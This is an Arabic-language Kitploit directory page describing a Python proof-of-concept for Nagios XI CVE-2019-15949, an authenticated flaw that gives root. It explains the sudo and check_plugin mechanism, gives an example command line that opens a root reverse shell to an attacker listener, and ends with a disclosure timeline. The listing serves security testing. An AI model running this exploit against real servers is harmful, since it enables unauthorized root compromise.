Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Nagios-CVE-2019-15949-RCE — PoC لثغرة Nagios CVE-2019-15949 rce في Python | Kitploit
أدوات/GitHubGitHub/plur1bu5/nagios-cve-2019-15949-rce
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubplur1bu5/nagios-cve-2019-15949-rce

Nagios-CVE-2019-15949-RCE

PoC لثغرة Nagios CVE-2019-15949 rce في Python

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Nagios-CVE-2019-15949-RCE-Poc

أداة PoC بلغة Python لثغرة CVE-2019-15949

نظرة عامة

توجد ثغرة في Nagios XI <= 5.6.5 تسمح للمهاجم باستغلال تنفيذ الأوامر عن بعد (RCE) لرفع الامتيازات إلى الجذر. يتطلب الاستغلال الوصول إلى الخادم كمستخدم nagios، أو الوصول إلى CCM عبر الواجهة الإلكترونية مع صلاحيات لإدارة الإضافات.

التفاصيل

يتم تنفيذ البرنامج النصي getprofile.sh، الذي يُستدعى عن طريق تنزيل ملف تعريف النظام (profile.php?cmd=download)، كجذر عبر إدخال sudo بدون كلمة مرور؛ ويقوم البرنامج النصي بتنفيذ الملف القابل للتنفيذ check_plugin المملوك لمستخدم nagios. يمكن لمستخدم مسجل الدخول إلى Nagios XI مع صلاحيات تعديل الإضافات، أو مستخدم nagios على الخادم، تعديل الملف القابل للتنفيذ check_plugin وإدراج أوامر ضارة قابلة للتنفيذ كجذر.

إثبات المفهوم (POC)

تم تطوير أداة POC بلغة PHP تقوم بتحميل حمولة تؤدي إلى إنشاء شيل عكسي بصلاحيات الجذر. الاستخدام:

python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport

مثال:

python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444

الإفصاح

  • أُبلغت Nagios في: 29 يوليو 2019
  • أكدتها Nagios في: 29 يوليو 2019
  • أُصلحت في الإصدار: 5.6.6 في: 20 أغسطس 2019
  • تم تعيين CVE في: 6 سبتمبر 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)
تنزيل الأداة